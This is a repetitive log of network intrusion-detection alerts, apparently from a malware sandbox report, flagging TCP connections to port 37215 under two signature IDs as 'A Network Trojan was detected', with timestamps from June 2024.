                SID:2835222
                Source Port:34090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134666
                SID:2835222
                Source Port:50932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183380
                SID:2835222
                Source Port:57690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148054
                SID:2835222
                Source Port:52158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.910548
                SID:2835222
                Source Port:59648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056378
                SID:2835222
                Source Port:56444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517485
                SID:2829579
                Source Port:34644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944267
                SID:2835222
                Source Port:60144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.674866
                SID:2835222
                Source Port:46878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804976
                SID:2835222
                Source Port:47990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337790
                SID:2835222
                Source Port:56800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244119
                SID:2829579
                Source Port:46952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640989
                SID:2835222
                Source Port:50656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.088807
                SID:2829579
                Source Port:39982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671384
                SID:2829579
                Source Port:55754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031159
                SID:2829579
                Source Port:51930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.094882
                SID:2835222
                Source Port:60906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804308
                SID:2835222
                Source Port:56474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672571
                SID:2829579
                Source Port:44782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669674
                SID:2835222
                Source Port:49978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699343
                SID:2835222
                Source Port:58072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718612
                SID:2835222
                Source Port:52830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848956
                SID:2835222
                Source Port:34258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503487
                SID:2829579
                Source Port:34362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421597
                SID:2835222
                Source Port:47144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772213
                SID:2829579
                Source Port:50128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766353
                SID:2835222
                Source Port:53808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732139
                SID:2829579
                Source Port:54046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735543
                SID:2829579
                Source Port:53316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227898
                SID:2835222
                Source Port:59106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291141
                SID:2835222
                Source Port:57360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452141
                SID:2835222
                Source Port:47218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704166
                SID:2829579
                Source Port:43198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675960
                SID:2835222
                Source Port:35868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765936
                SID:2829579
                Source Port:37898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965682
                SID:2829579
                Source Port:48544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470581
                SID:2829579
                Source Port:35078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733288
                SID:2829579
                Source Port:49398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779220
                SID:2835222
                Source Port:57424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164536
                SID:2829579
                Source Port:34668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979100
                SID:2835222
                Source Port:46990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828092
                SID:2829579
                Source Port:59966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018211
                SID:2829579
                Source Port:35522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243525
                SID:2835222
                Source Port:33728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702550
                SID:2835222
                Source Port:57784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545670
                SID:2829579
                Source Port:44622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791556
                SID:2835222
                Source Port:47448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018352
                SID:2835222
                Source Port:53798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670731
                SID:2829579
                Source Port:41326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274853
                SID:2835222
                Source Port:38970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861130
                SID:2835222
                Source Port:33142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504411
                SID:2835222
                Source Port:52218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916170
                SID:2829579
                Source Port:56152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.473697
                SID:2835222
                Source Port:55496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729210
                SID:2835222
                Source Port:35034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184599
                SID:2829579
                Source Port:36138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725188
                SID:2829579
                Source Port:47316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766784
                SID:2835222
                Source Port:36360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115533
                SID:2835222
                Source Port:47736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274609
                SID:2829579
                Source Port:38198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662967
                SID:2829579
                Source Port:42584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133147
                SID:2829579
                Source Port:59744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669302
                SID:2829579
                Source Port:59850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449656
                SID:2835222
                Source Port:42294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724976
                SID:2835222
                Source Port:37102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340144
                SID:2829579
                Source Port:46142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073094
                SID:2835222
                Source Port:39590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018312
                SID:2835222
                Source Port:38436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846742
                SID:2835222
                Source Port:56548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277158
                SID:2829579
                Source Port:52166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292582
                SID:2829579
                Source Port:49010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978215
                SID:2835222
                Source Port:49912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133014
                SID:2835222
                Source Port:51752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275002
                SID:2835222
                Source Port:44998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684516
                SID:2835222
                Source Port:52756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617413
                SID:2835222
                Source Port:42536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943000
                SID:2829579
                Source Port:60256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323489
                SID:2835222
                Source Port:40918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704720
                SID:2829579
                Source Port:33996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519856
                SID:2835222
                Source Port:52538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718178
                SID:2829579
                Source Port:55562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295500
                SID:2835222
                Source Port:50302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340583
                SID:2829579
                Source Port:49778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151081
                SID:2835222
                Source Port:57632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966209
                SID:2829579
                Source Port:45490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033904
                SID:2829579
                Source Port:52616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763627
                SID:2829579
                Source Port:47324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969580
                SID:2835222
                Source Port:57668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810027
                SID:2835222
                Source Port:49196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020470
                SID:2829579
                Source Port:39236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422140
                SID:2835222
                Source Port:56388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702172
                SID:2835222
                Source Port:54370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660975
                SID:2829579
                Source Port:40200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420035
                SID:2835222
                Source Port:49142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942509
                SID:2829579
                Source Port:45504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452721
                SID:2835222
                Source Port:50422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861680
                SID:2829579
                Source Port:37612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661205
                SID:2835222
                Source Port:46264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225437
                SID:2835222
                Source Port:33432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687393
                SID:2835222
                Source Port:53168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150806
                SID:2835222
                Source Port:60690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325360
                SID:2829579
                Source Port:55882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179901
                SID:2829579
                Source Port:40046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979978
                SID:2829579
                Source Port:52612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676146
                SID:2835222
                Source Port:51348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829544
                SID:2829579
                Source Port:45728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152146
                SID:2835222
                Source Port:40162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134167
                SID:2829579
                Source Port:54758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682569
                SID:2835222
                Source Port:33784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679542
                SID:2835222
                Source Port:39500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053503
                SID:2835222
                Source Port:52108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732520
                SID:2829579
                Source Port:36012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182681
                SID:2835222
                Source Port:60478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917555
                SID:2835222
                Source Port:37610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970879
                SID:2829579
                Source Port:46096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968004
                SID:2829579
                Source Port:60498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618791
                SID:2829579
                Source Port:35712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053624
                SID:2829579
                Source Port:45980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879873
                SID:2829579
                Source Port:39448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944028
                SID:2835222
                Source Port:38570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228654
                SID:2835222
                Source Port:52422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148733
                SID:2829579
                Source Port:58630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367586
                SID:2835222
                Source Port:51686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614082
                SID:2829579
                Source Port:54454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663419
                SID:2835222
                Source Port:47616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501842
                SID:2835222
                Source Port:57282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326228
                SID:2835222
                Source Port:35438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228452
                SID:2829579
                Source Port:60040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150662
                SID:2835222
                Source Port:48404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.728142
                SID:2829579
                Source Port:59850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014445
                SID:2829579
                Source Port:59462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.246272
                SID:2829579
                Source Port:49906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184762
                SID:2835222
                Source Port:38400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245479
                SID:2835222
                Source Port:52682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227858
                SID:2829579
                Source Port:39284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115090
                SID:2835222
                Source Port:36750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152691
                SID:2835222
                Source Port:54668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684423
                SID:2829579
                Source Port:46152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682511
                SID:2835222
                Source Port:55442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134607
                SID:2829579
                Source Port:37674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813216
                SID:2829579
                Source Port:41574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290471
                SID:2835222
                Source Port:35480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858180
                SID:2829579
                Source Port:42034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.896363
                SID:2829579
                Source Port:59188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149483
                SID:2829579
                Source Port:59342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934817
                SID:2835222
                Source Port:46934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016438
                SID:2829579
                Source Port:33164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034072
                SID:2829579
                Source Port:45938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724389
                SID:2829579
                Source Port:37898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034462
                SID:2829579
                Source Port:34654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277134
                SID:2829579
                Source Port:36366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450077
                SID:2835222
                Source Port:47412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229444
                SID:2829579
                Source Port:36772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025673
                SID:2835222
                Source Port:55294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759943
                SID:2835222
                Source Port:55316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618330
                SID:2835222
                Source Port:45140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.176586
                SID:2829579
                Source Port:47858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717433
                SID:2829579
                Source Port:49548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718386
                SID:2835222
                Source Port:60252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732498
                SID:2835222
                Source Port:54510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470649
                SID:2829579
                Source Port:47766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502660
                SID:2829579
                Source Port:57966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.079107
                SID:2835222
                Source Port:46828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684775
                SID:2829579
                Source Port:52604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725816
                SID:2829579
                Source Port:47096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293068
                SID:2829579
                Source Port:33046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803612
                SID:2835222
                Source Port:50034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941317
                SID:2835222
                Source Port:56984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092066
                SID:2835222
                Source Port:50202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705050
                SID:2829579
                Source Port:45024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517630
                SID:2835222
                Source Port:42016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.946861
                SID:2829579
                Source Port:51548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989364
                SID:2835222
                Source Port:44646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827419
                SID:2835222
                Source Port:60576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682788
                SID:2829579
                Source Port:39594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718246
                SID:2835222
                Source Port:60476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700207
                SID:2835222
                Source Port:45904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850508
                SID:2835222
                Source Port:36668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861652
                SID:2829579
                Source Port:58162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421847
                SID:2829579
                Source Port:53552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366442
                SID:2835222
                Source Port:60894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291871
                SID:2829579
                Source Port:50604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502966
                SID:2829579
                Source Port:59398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018861
                SID:2835222
                Source Port:60192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966501
                SID:2829579
                Source Port:39434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132020
                SID:2829579
                Source Port:42644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944515
                SID:2829579
                Source Port:47864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980439
                SID:2835222
                Source Port:52564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763022
                SID:2835222
                Source Port:57686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988923
                SID:2829579
                Source Port:60406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149230
                SID:2829579
                Source Port:41460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115213
                SID:2829579
                Source Port:39014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452972
                SID:2835222
                Source Port:57340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.905919
                SID:2835222
                Source Port:44524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033456
                SID:2835222
                Source Port:50540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022055
                SID:2835222
                Source Port:57522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847641
                SID:2829579
                Source Port:36232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245864
                SID:2835222
                Source Port:48524
                Destination Port:37215
